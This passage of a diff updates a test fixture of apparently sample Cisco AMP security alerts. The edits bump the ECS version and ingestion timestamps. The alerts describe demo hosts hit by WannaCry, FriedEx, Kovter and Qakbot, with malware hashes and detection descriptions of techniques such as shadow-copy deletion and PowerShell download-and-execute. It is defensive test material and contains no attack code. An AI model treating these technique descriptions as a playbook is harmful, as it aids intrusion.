Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503301\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2693,7 +2693,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2723,7 +2723,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854051576Z", + "ingested": "2021-09-13T18:07:55.452601659Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":893000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437902\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2780,7 +2780,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2812,7 +2812,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854053426Z", + "ingested": "2021-09-13T18:07:55.452603555Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":456000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179213462437899\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2865,7 +2865,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2885,7 +2885,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854055298Z", + "ingested": "2021-09-13T18:07:55.452605458Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179213462438000,\"timestamp\":1610623596,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T11:26:36+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419179204872503299\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -2940,7 +2940,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2972,7 +2972,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854057182Z", + "ingested": "2021-09-13T18:07:55.452607341Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":957000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470602\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3029,7 +3029,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3061,7 +3061,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854059068Z", + "ingested": "2021-09-13T18:07:55.452609262Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179209167470598\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3118,7 +3118,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3150,7 +3150,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854060930Z", + "ingested": "2021-09-13T18:07:55.452611169Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":941000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419179209167470601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3216,7 +3216,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3248,7 +3248,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854062787Z", + "ingested": "2021-09-13T18:07:55.452613080Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419179209167471000,\"timestamp\":1610623595,\"timestamp_nanoseconds\":894000000,\"date\":\"2021-01-14T11:26:35+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419179204872503300\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":3020,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "kind": "alert", "action": "Threat 
Detected", @@ -3318,7 +3318,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3346,7 +3346,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854064627Z", + "ingested": "2021-09-13T18:07:55.452614986Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583840597369422000,\"timestamp\":1610621973,\"timestamp_nanoseconds\":231000000,\"date\":\"2021-01-14T10:59:33+00:00\",\"event_type\":\"Malicious Activity Detection\",\"event_type_id\":1090519105,\"detection\":\"W32.MAP.Ransomware.rewrite\",\"detection_id\":\"6583840593074454529\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mscorsvw.exe\",\"file_path\":\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\mscorsvw.exe\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", 
"kind": "alert", "action": "Malicious Activity Detection", @@ -3410,7 +3410,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3430,7 +3430,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854066521Z", + "ingested": "2021-09-13T18:07:55.452616892Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "kind": "alert", "start": "2021-01-14T10:59:30.000Z", @@ -3496,7 +3496,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3516,7 +3516,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854068405Z", + "ingested": "2021-09-13T18:07:55.452618792Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. 
Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "kind": "alert", "start": "2021-01-14T10:55:07.000Z", @@ -3582,7 +3582,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3602,7 +3602,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854070258Z", + "ingested": "2021-09-13T18:07:55.452620699Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3668,7 +3668,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3688,7 +3688,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:32:23.854072129Z", + "ingested": "2021-09-13T18:07:55.452622602Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "kind": "alert", "start": "2021-01-14T10:47:17.000Z", @@ -3747,7 +3747,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3767,7 +3767,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:32:23.854074002Z", + "ingested": "2021-09-13T18:07:55.452624523Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -3822,7 +3822,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3842,7 +3842,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-09-12T17:32:23.854075908Z",
+ "ingested": "2021-09-13T18:07:55.452626393Z",
